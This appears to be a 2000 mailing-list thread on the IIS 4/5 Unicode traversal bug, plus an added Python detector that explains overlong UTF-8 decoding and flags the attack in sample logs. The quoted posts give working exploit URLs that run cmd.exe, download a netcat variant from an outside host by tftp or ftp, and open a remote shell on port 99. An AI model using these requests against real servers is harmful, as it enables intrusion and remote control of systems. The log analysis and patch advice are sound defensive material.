Subject: Re: dos commands via iis 4
From: Nikolaou, Dinos (dreamerDARKNESS.GR)
Date: Fri Nov 10 2000 - 12:27:04 CST


Greetings all,
        Why bother so much adding usernames and passwords to files
when you can just use the tftp that already exists in every
winnt\system32 directory. Just

http://www.site.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe%20-i%20my.nice.host.co.uk%20GET%20ncx99.exe+c:\winnt\system32\ncx99.exe

Where ncx99.exe is a variation of netcat for Windows. You will just have to
run a tftpd server at your host.

Regards,
Nick Krassas
dreamerdarkness.gr

On Thu, 9 Nov 2000, RayW, CISSP wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello All,
>
>
> or you could really have fun with a command line dos shell :)
>
>
> http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\ftp.exe+ftp2.exe
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+open%20ftp.site.com+>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+username+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+userpassword+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+get%20ncx99.exe+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+quit+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/ftp2.exe?-s:file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/ncx99.exe?
>
>
> then telnet to www.site.com port 99 and you have a shell on the local
> machine, granted limited access,
> but that is just another step..... I will leave that up to you all.
>
>
> Regards,
>
>
> RayW, CISSP
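Added example, not code from either post in this thread. Both posts rely on the same primitive: unpatched IIS 4/5 looked for ".." in the request path before UTF-8 decoding and accepted overlong UTF-8 sequences, so "..%c0%af" passed the check and then decoded to "../". The script below reproduces that permissive decoding next to a conforming decoder that rejects the overlong form, and runs a traversal check over constructed (made-up) IIS-style log lines built from the URLs in the thread. The log layout, field names, the 10.x client addresses and all function names are my own assumptions.

```python
"""
Added example (not from the original posts): why "..%c0%af.." works and how
to spot it in web-server logs.

Lenient decoder  = what unpatched IIS did (overlong UTF-8 accepted).
Strict decoder   = what a conforming decoder does (overlong UTF-8 rejected).
"""
from urllib.parse import unquote_to_bytes


def lenient_utf8_decode(data: bytes) -> str:
    """Decode like a permissive 2000-era decoder: 2- and 3-byte sequences are
    accepted even when overlong, so C0 AF -> '/', C1 9C -> '\\', E0 80 AF -> '/'.
    Bytes that fit no pattern are passed through as Latin-1."""
    def is_cont(j: int) -> bool:            # is data[j] a 10xxxxxx continuation byte?
        return j < len(data) and 0x80 <= data[j] <= 0xBF

    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b <= 0xDF and is_cont(i + 1):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        elif 0xE0 <= b <= 0xEF and is_cont(i + 1) and is_cont(i + 2):
            out.append(chr(((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6)
                           | (data[i + 2] & 0x3F))); i += 3
        else:
            out.append(chr(b)); i += 1
    return "".join(out)


def strict_utf8_decode(data: bytes):
    """Conforming behaviour: an overlong sequence is a decoding error (None)."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_request_path(raw_path: str) -> str:
    """Percent-decode, UTF-8-decode leniently, then treat backslash as a path
    separator the way the Windows file system does."""
    return lenient_utf8_decode(unquote_to_bytes(raw_path)).replace("\\", "/")


def escapes_virtual_dir(raw_path: str) -> bool:
    """True if the fully decoded path climbs out of its first directory
    (e.g. /scripts, which IIS maps to a directory such as c:\\inetpub\\scripts)."""
    segs = [s for s in decode_request_path(raw_path).split("/") if s not in ("", ".")]
    depth = 0
    for seg in segs[1:]:                    # segs[0] is the virtual directory itself
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


# Constructed sample in a simplified W3C layout (assumption):
# date time c-ip method uri-stem uri-query status
SAMPLE_LOG = r"""
2000-11-10 18:27:04 10.1.2.3 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp.exe%20-i%20my.nice.host.co.uk%20GET%20ncx99.exe+c:\winnt\system32\ncx99.exe 200
2000-11-09 21:10:11 10.1.2.3 GET /scripts/..%c0%af/winnt/system32/cmd.exe /c+copy+..\..\winnt\system32\ftp.exe+ftp2.exe 200
2000-11-09 21:10:12 10.1.2.3 GET /scripts/..%c0%af../inetpub/scripts/cmd1.exe /c+echo+open%20ftp.site.com+>file 200
2000-11-09 21:11:00 10.1.2.3 GET /scripts/..%c0%af../inetpub/scripts/ncx99.exe - 200
2000-11-09 21:12:00 10.9.9.9 GET /scripts/reports/../summary.asp id=7 200
2000-11-09 21:13:00 10.9.9.9 GET /scripts/%c0%ae%c0%ae/winnt/system32/cmd.exe /c+dir 200
2000-11-09 21:14:00 10.9.9.9 GET /default.asp - 200
""".strip()


def flag_traversal(log_text: str) -> list:
    """One record per request whose decoded URI stem escapes its virtual
    directory, with the decoded path and whether a strict decoder would
    even have accepted the bytes."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        date, time, client, method, stem, query, status = line.split(maxsplit=6)
        if escapes_virtual_dir(stem):
            hits.append({
                "time": f"{date} {time}", "client": client, "raw": stem,
                "decoded": decode_request_path(stem),
                "strict_utf8_ok": strict_utf8_decode(unquote_to_bytes(stem)) is not None,
            })
    return hits


if __name__ == "__main__":
    for h in flag_traversal(SAMPLE_LOG):
        print(f'{h["time"]} {h["client"]} {h["raw"]} -> {h["decoded"]} '
              f'(valid UTF-8: {h["strict_utf8_ok"]})')
```

The `/scripts/reports/../summary.asp` line is deliberately left unflagged: ".." inside the virtual directory is ordinary, and a detector that alerts on every ".." drowns in noise. The `%c0%ae%c0%ae` line shows the same overlong trick applied to the dots rather than the slash, which is why the check decodes first and inspects path segments afterwards instead of grepping the raw URL for "..%c0%af". The server-side fix is the same idea in reverse: canonicalise after full decoding, reject overlong UTF-8 outright, and apply the vendor patch (MS00-078 for IIS 4.0/5.0).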